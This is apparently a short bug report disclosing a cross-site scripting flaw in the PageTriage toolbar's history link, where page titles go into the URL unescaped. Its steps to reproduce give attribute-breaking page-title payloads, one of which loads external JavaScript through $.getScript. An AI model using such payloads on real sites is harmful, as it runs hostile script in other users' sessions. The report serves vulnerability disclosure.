The page title in the URL of the history link in the PageTriage toolbar is not URL encoded or escaped, allowing possible (though unlikely to successfully exploit) XSS.
Steps to reproduce:
- Create a page with the title: "onmouseover="alert(0);"" (or create a title with a URL to external JS, i.e. "onmouseover="$.getScript('http://127.0.0.1/t.js')"")
- With an account that can patrol pages, visit the page and open the info tab
- Hover over the "show full history" link